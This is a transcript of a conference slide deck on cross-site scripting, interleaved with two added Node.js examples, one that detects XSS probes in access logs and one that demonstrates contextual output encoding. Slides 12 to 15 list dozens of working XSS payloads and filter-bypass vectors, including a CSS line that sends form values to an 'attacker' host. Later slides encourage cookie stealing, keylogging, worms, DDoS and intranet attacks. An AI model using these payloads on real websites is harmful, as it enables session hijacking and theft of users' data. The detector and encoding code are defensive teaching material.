Xss is more than a simple threat

XSS is more than you can imagine. You should take a look.

Published in: Education


  1. XSS is more than a simple threat
     - Avădănei Andrei
     - Software Developer, Blogger, Student
     - www.worldit.info
     - @AndreiAvadanei
     - [email_address]
     - #RoCyberCon @20 february
  2. Introduction to XSS
     - Short story
     - XSS types
     - Shouts
  3. Short story
     XSS
     - it's a client side vulnerability
     - ... but can become a server side one
     - based on JavaScript injection
     - ... and HTML, Java, ActiveX, VBScript, Flash, JSON and so on
     - is the second most popular threat in 2010 (via Infosec & OWASP)
     - with many resources available on the Internet (use Google)
  4. XSS Types
     Non-persistent (reflected)
     - the most common type of XSS injection
     - requires server side interpretation of the query
     - a third party is required
     Persistent (stored)
     - the most dangerous type of XSS injection
     - requires server side interpretation of the query and data storage
     - a third party may not be required
     DOM-based
     - the newest type of XSS injection
     - requires client side interpretation
     - usually non-persistent
  5. Shouts #1 – XSS Amazon
  6. Shouts #2 – XSS Facebook
  7. Shouts #3 – XSS Google
  8. Shouts #4 – XSS Ebay
  9. Shouts #5 – More XSS'ed
     - Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info, PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.
  10. Getting XSS'ed
     - Where?
     - Basic XSS'ing
     - Advanced XSS'ing
     - HTML 5 XSS'ed
     - Bypass XSS protection
  11. Where? Everywhere
     - Rule: "Do not trust anything, ever, especially when it comes to user input."
     - XSS vulnerabilities can be found in anything that comes from the user.
     - GET, POST, COOKIE, FILES, SERVER and headers are the main targets.
     - Try to be clever.
  12. Basic XSS'ing
     - <script>alert(1)</script> //basic
     - "><script>alert(1)</script> //break out of an open tag
     - <!--<img src="--><img src=x onerror=alert(1)//"> //bypass a comment & generate an error
     - " onmouseover="alert(1)" //any JavaScript event handler
     - alert(/XSS/.source) or alert(String(/Test/).substr(1,4)); //some other simple vectors
     - <script>alert(String.fromCharCode(88,83,83));</script> //bypass quote filters
     - <IMG SRC=javascript:alert('XSS')> //unicode injection; UTF-8, hex, decimal or octal encoding may work
     - <meta http-equiv="refresh" content="0;url=http://;javascript:..."> //evasion
     - <style type=text/javascript>alert('xss')</style> //JavaScript injection based on the style tag
     - "><img src="x:x" onerror="alert(0)"> // :D
     - [...]
  13. Advanced XSS'ing
     - <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
     - <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
     - <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> //background & unicode
     - exp/*<A STYLE='noxss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> //send IE into a loop
     - <XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> //XSS in an XML document
     - x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)(); //something different from everyday injections
     - Function('a\x6cert(1)')(); // ;)
     - x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection
     - [...]
  14. HTML 5 XSS'ed
     - new technologies, new problems
     - <video onerror="javascript:alert(1)"><source> //new tag
     - <audio onerror="javascript:alert(1)"><source> //another new tag
     - <form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events
     - <div draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'Evil payload')"> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes
     - <input type="text" AUTOFOCUS onfocus=alert(1)>
     - <script>alert(localStorage.getItem('foo'))</script> //access local storage
     - "><script>(history.pushState({},'','index.php'))(document.forms[0].action='http://maliciousURL')</script> //conceal the real location and replace it with anything we want. Ex: http://bit.ly/pushStateXSS
  15. Bypass XSS protection
     - <img/src="mars.png"alt="mars"> //no white space, use / instead
     - <object data="javascript:alert(0)"> //avoid src
     - <isindex type=image src=1 onerror=alert(1)> //did you know the isindex tag?
     - <img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation
     - location=location.hash.slice(1); //avoid the #
     - http://victim.com?param=";location=location.hash)//#0={};alert(0) //payload after the hash in the URL, the victim won't see the true payload
     - alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results
     - ""+{toString:alert} or ""+{valueOf:alert} //executes a function without using () or =
     Future tricks in HTML 5
     - </a onmousemove="alert(1)"> //HTML 5 will support events in closing tags
     - <style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure CSS-based XSS
     - data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== //avoid using the plain text/html value
     - ?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi
     via BlackHat conferences.
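The bypass list above is also the reason a naive substring filter is weak on the detection side: case changes, "/" instead of spaces, URL encoding and double URL encoding all hide the same vector. The following is an added example (not from the slides and not the author's code) of a small Node.js script that normalises the request path from access-log lines before matching it against indicators drawn from the vectors listed in slides 12 to 15. The log lines, the `INDICATORS` list and the helper names (`normalise`, `scanLine`, `scanLog`) are constructed for this example.

```javascript
// Added example (not from the slides): flag XSS probes in web-server access logs.
// Indicator regexes are drawn from the vectors shown in slides 12-15; the log
// lines and all helper names are constructed for this example.

// Indicators are matched against the *normalised* request path, so they are
// written in lower case and do not need to anticipate encoding or case tricks.
const INDICATORS = [
  /<\s*script\b/,                                   // <script>, <script+..., <script/...
  /\bon[a-z]+\s*=/,                                 // onerror=, onmouseover=, onfocus=, ...
  /javascript\s*:/,                                 // javascript: in src/href/refresh
  /data\s*:\s*text\/html/,                          // data:text/html;base64,...
  /<\s*(img|iframe|video|audio|object|isindex|meta|style)\b/,
  /\b(eval|alert|string\.fromcharcode|function)\s*\(/,
  /\blocation\s*=\s*location\.hash/,                // payload hidden after the #
];

// Undo the encoding layers an attacker may add: '+' to space, then percent
// decoding repeated (bounded) until the string stops changing, so double and
// triple encoding collapse; then lower-case and collapse whitespace.
function normalise(raw) {
  let s = raw;
  for (let round = 0; round < 3; round++) {
    let decoded;
    try {
      decoded = decodeURIComponent(s.replace(/\+/g, ' '));
    } catch (_) {
      break; // malformed %-sequence: keep what we have
    }
    if (decoded === s) break;
    s = decoded;
  }
  return s.toLowerCase().replace(/\s+/g, ' ');
}

// Minimal parser for the common/combined log format: client, timestamp,
// method, request path and status. Everything after the path is ignored.
const LOG_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

function scanLine(line) {
  const m = LOG_RE.exec(line);
  if (m === null) return null;
  const [, client, timestamp, method, path, status] = m;
  const text = normalise(path);
  const hits = INDICATORS.filter((re) => re.test(text)).map((re) => re.source);
  return hits.length > 0 ? { client, timestamp, method, path, status, hits } : null;
}

function scanLog(lines) {
  return lines.map(scanLine).filter((finding) => finding !== null);
}

// Constructed sample log (not real traffic). Lines 2-5 carry encoded versions
// of vectors from the slides; line 5 is double URL-encoded.
const SAMPLE_LOG = [
  '10.0.0.7 - - [20/Feb/2011:10:01:02 +0200] "GET /search?q=laptop HTTP/1.1" 200 512',
  '10.0.0.9 - - [20/Feb/2011:10:01:05 +0200] "GET /search?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640',
  '10.0.0.9 - - [20/Feb/2011:10:01:09 +0200] "GET /profile?name=%3Cimg/src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 640',
  '10.0.0.12 - - [20/Feb/2011:10:02:11 +0200] "GET /page?injection=%3Cscript%2B&injection=%3Ealert(1)%3E%3C/script%3E HTTP/1.1" 200 300',
  '10.0.0.15 - - [20/Feb/2011:10:03:00 +0200] "GET /view?u=%2522%2520onmouseover%253dalert(1) HTTP/1.1" 200 300',
  '10.0.0.20 - - [20/Feb/2011:10:04:00 +0200] "GET /static/app.js HTTP/1.1" 200 9000',
];

console.log(JSON.stringify(scanLog(SAMPLE_LOG), null, 2));
```

The normalisation step is the part worth keeping: without it the double-encoded line would pass every indicator. The indicators themselves are deliberately broad (they will flag legitimate pages that mention `alert(` in a query string), so treat hits as review candidates rather than verdicts.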
  16. XSS Injection Exploitation (part 1)
     - Redirection
     - Clickjacking
     - URL Spoofing
     - Session hijacking
     - Cookie stuffing
     - Ad Hijacking
     - CSRF/XSRF attacks
     - History stealing
     - XSS Defacement
     - Key & Mouse logging
  17. Redirection & Clickjacking
     Redirection
     - redirect your victim, ex. document.location = "http://www.your-evil-site.com";
     - you create fake traffic
     - popular
     Clickjacking
     - describes a website that poses as another.
     - ex.: redirect the victim by calling your onclick event
     - used in phishing, gives high credibility
     - extremely popular
  18. URL Spoofing
     - popular in phishing
     - the URL is user friendly
     - the web page content is hijacked and all information is sent to websites monitored by a thief
     - extremely popular
  19. Session Hijacking
     - also known as "Cookie Stealing"
     - usually used with document.cookie
     - helps you gain control over another logged-in session
     - needs a cookie grabber
     - for instance, an XSS in *.yahoo.com can help you hijack Yahoo accounts
     - extremely popular
  20. Cookie stuffing
     - also known as cookie dropping
     - used in blackhat online marketing
     - generates illegitimate affiliate sales by hijacking cookies
     - uses pop-ups, frames and iframes, images, JavaScript, stylesheets or Flash to accomplish cookie dropping
     - popular
  21. Ad Hijacking
     - used in blackhat online marketing
     - usually requires persistent XSS
     - you can replace ad scripts with your own, getting paid when the user clicks on hijacked ads
     - popular
  22. CSRF/XSRF attacks
     - unauthorized commands are transmitted from a user that the website trusts.
     - usually used along with <img src="">.
     - for instance, if <img src="http://victim.com/?do=logout" /> is permanently injected and a user accesses the page with the malformed content, he will be forced to log out.
     - use your imagination, you can do more than that.
  23. History Stealing
     - You can find out what sites have been visited by the victim using getComputedStyle as below, after you create a link node whose CSS :visited selector sets a custom known color:
     - document.defaultView.getComputedStyle(link, null).getPropertyValue("color");
     - rarely used, but still important
     - it could be done using the full power of HTML 5
  24. XSS Defacement
     - looks like a server side defaced page
     - ... but it's only a client side deface
     - can create chaos and confusion when used for hacking a website
     - involves changing the HTML content of the page
     - of course, two types: persistent and non-persistent
     - persistent XSS defaces are more dangerous than non-persistent ones
  25. Key & Mouse Logging
     Keylogging
     - log all keystrokes and send them remotely
     - document.onkeypress / unsafeWindow.onkeypress events
     - store keystrokes in a local variable and send them regularly to a remote server
     Mouse logging
     - log all mouse moves and send them remotely
     - document.onmousemove event
     - dangerous but not so popular
  26. Tired?
     - You shouldn't be, because this is only the beginning...
  27. XSS Injection Exploitation (part 2)
     - Browser hijacking
     - Port Scanning
     - DDoS
     - XSS Tunneling
     - Distributed Password Cracking
     - Worms (Spreading)
     - Arbitrary file execution & Privilege escalation
     - Intranet Hacking
  28. Browser Hijacking
     - Also known as Tab Hijacking.
     - Highly recommended when the hacker wants a second shot at the victim.
     - XSS Shells usually do it for you
     - With iframe injection
     - Works until the victim closes the tab.
     - The only drawback of this method is that the URL bar does not change with each click, which may or may not be noticeable to the user.
  29. Distributed port scanning
     - Cross domain XMLHttpRequests and WebSockets can perform remote port scanning, but using XSS you can do distributed remote port scanning
     - The latest Firefox, Chrome and Safari already support these new technologies
     - This option is not available yet, but it will be in the next generation of XSS Shell
     - Firefox & Safari connection time is less than 100 ms
     - 1 victim – 65,000 scanned ports – 6,500 seconds
     - 100 victims – 65,000 scanned ports – 6.5 seconds
     - What about 1,000 or 10,000 victims?
  30. DDoS
     - Based on WebSockets
     - Application-level DDoS attacks (layer 7 DDoS)
     - Cross Origin Requests (COR) are processed even if the site has restrictions, and therefore the request still creates load on the server
     - 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with GET requests
     - 1 minute – 600 browsers – over 100,000 requests / minute can be enough to shut down a target
     - We should wait for the majority of the browsers in the world to be upgraded
     - But blackhat teams will be prepared with amazing tools for DDoS
  31. XSS Tunneling
     - An XSS Channel is an interactive communication channel between two systems which is opened by an XSS attack.
     - At the technical level, it may be an Ajax application. Node.js and Comet push can make a difference in future XSS Shells.
     - XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to use virtually any application that supports HTTP proxies.
     - An XSS Tunnel is a standard HTTP proxy which sits on the attacker's system.
     - You can tunnel all your traffic through an XSS Channel.
     - You can build your own SSH-like protocol.
     - You can forget about the user session problem when hijacking is not possible because of an IP address restriction.
     - Again, your imagination is the limit.
  32. Distributed Password Cracking
     - JavaScript engines are becoming very fast.
     - And we have WebWorkers.
     - Password guessing rates in JavaScript tools of 100,000 MD5 hashes/second.
     - ~100 machines running the JavaScript distributed password cracking program can match the cracking rate of one machine running a similar program written in native code.
     - But these days spreading methods are very effective. Why not 10,000 compromised machines?
     - Ravan – a JavaScript distributed password cracker that uses HTML5 WebWorkers.
     - Performs password cracking in background JavaScript threads.
     - Supports salted MD5 and SHA hashes.
  33. Worms (spreading)
     - One of the most efficient environments for worm propagation: social networking
     - XSS Warhol Worm
     - Linear XSS Worm
     - Hydra XSS Worm
     - Samy (2005) infected over 1,000,000 users on MySpace in 20 hours
     - Yahoo!, Hi5, Twitter and Facebook could easily be the next targets on a larger scale.
     - You can simply attach a trojan to your worm, and the risk of creating permanent zombies grows.
  34. Arbitrary file execution
     - In 2008 a vulnerability which affected IE 7 & IE 8 could execute arbitrary files using some social engineering skills.
     - During the last years a few other similar vulnerabilities appeared in the Internet jungle.
     - Still, an XSS vulnerability plus a CSRF vulnerability in an administrator file editor, which can be bypassed with same-origin XMLHttpRequests, is the right combination: an XSS vulnerability has become arbitrary code execution (privilege escalation).
     - What are you waiting for? Find the next major privilege escalation vulnerability.
  35. Intranet Hacking (part 1)
     - Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?
  36. Intranet Hacking (part 2)
     Exploit procedure:
     - A victim visits a malicious Web page or clicks a nefarious link; embedded JavaScript malware then assumes control over their Web browser.
     - The JavaScript malware loads a Java applet revealing the victim's internal NAT IP address.
     - Then, using the victim's Web browser as an attack platform, the JavaScript malware identifies and fingerprints Web servers on the internal network.
     - Attacks are initiated against internal or external Web sites, and compromised information is sent outside the network for collection.
  37. Intranet Hacking (part 3)
     Collecting information:
     - Obtaining the NAT'ed IP address – MyAddress, a special Java applet
     - Port scanning – <script src=http://ip/></script>
     - Blind Web Server Fingerprinting – explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting.
       - <img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" />
     Attack the intranet
       - try different well-known vulnerabilities
       - try hacking the web interface of DSL routers
       - load local files using file:///
       - get help from XSS Shells
  38. Preventing XSS attacks
     - Filtering
     - Input / Output encoding
     - Web browser security
       - select a safer browser (Chrome)
       - use a virtual machine for suspicious links
       - pay more attention to shortened URLs
       - use plugins for better security (like NoScript)
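Slide 11's rule ("do not trust anything that comes from the user") and slide 38's "Input / Output encoding" come together in contextual output encoding: the same untrusted value needs a different encoding depending on whether it lands in HTML text, a quoted attribute, a JavaScript string literal or a URL parameter, and encoding alone does not help if the attribute is left unquoted. The following is an added example (not from the slides and not the author's code) in Node.js; the function names (`encodeForHtml`, `encodeForJsString`, `encodeForUrlParam`, `renderGreeting`, `renderUnquotedAttribute`, `attributeNames`, `injectedHandlers`) and the probe strings are constructed for it. The probes are the vectors from slide 12; `attributeNames` is a deliberately small attribute tokenizer used only to inspect the rendered output, not a substitute for a real HTML parser.

```javascript
// Added example (not from the slides): contextual output encoding for untrusted
// values. Helper names are hypothetical; the probes are constructed test inputs.

// HTML text and quoted-attribute context: neutralise every character that can
// open a tag, end an attribute value or start an entity.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// JavaScript string-literal context: escape everything except [A-Za-z0-9] as
// \xHH or \uHHHH, so quotes, backslashes and "</script>" cannot end the literal
// or the script block.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL query-parameter context.
function encodeForUrlParam(value) {
  return encodeURIComponent(String(value));
}

// The same untrusted value rendered into four contexts, each with the encoder
// that matches the context. Note that the attribute value is quoted.
function renderGreeting(name) {
  return [
    `<p>Hello, ${encodeForHtml(name)}</p>`,
    `<input type="text" value="${encodeForHtml(name)}">`,
    `<script>var user = '${encodeForJsString(name)}';</script>`,
    `<a href="/profile?name=${encodeForUrlParam(name)}">profile</a>`,
  ].join('\n');
}

// A common mistake: the value is HTML-encoded but the attribute is unquoted, so
// a space is enough to start a new attribute (slide 12's onmouseover= trick
// without any quote character at all).
function renderUnquotedAttribute(name) {
  return `<input type="text" value=${encodeForHtml(name)}>`;
}

// Tiny attribute tokenizer used only to inspect the rendered markup in this
// example (not a real HTML parser): returns the attribute names of every start
// tag, in document order.
function attributeNames(html) {
  const tagRe = /<([a-z][a-z0-9]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/gi;
  const attrRe = /([^\s"'>\/=]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?/g;
  const names = [];
  let tag;
  while ((tag = tagRe.exec(html)) !== null) {
    let attr;
    attrRe.lastIndex = 0;
    while ((attr = attrRe.exec(tag[2])) !== null) names.push(attr[1].toLowerCase());
  }
  return names;
}

// Event-handler attributes (on*) found on any tag: none should exist in output
// built from untrusted data.
function injectedHandlers(html) {
  return attributeNames(html).filter((n) => n.startsWith('on'));
}

// Constructed probes, taken from the vectors listed on slide 12.
const PROBES = [
  '"><script>alert(1)</script>',
  '" onmouseover="alert(1)"',
  'x onmouseover=alert(1)',
  "'; alert(1); //",
];

for (const probe of PROBES) {
  console.log(JSON.stringify(probe),
    'quoted:', injectedHandlers(renderGreeting(probe)),
    'unquoted:', injectedHandlers(renderUnquotedAttribute(probe)));
}
```

The design choice to note is that the encoder is picked by the destination context, not by the input: `encodeForHtml` inside a JavaScript literal would corrupt the data rather than protect the script block, and `encodeForJsString` inside an HTML attribute would be undone by the HTML parser before the script ever runs. Quoting the attribute is part of the encoding contract, which is why `renderUnquotedAttribute` fails for the third probe even though the value went through `encodeForHtml`.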
  39. Is XSS still a simple threat?
     - :)
  40. Questions?
     - Thanks. :)
  41. Bibliography
     - Experience & Google.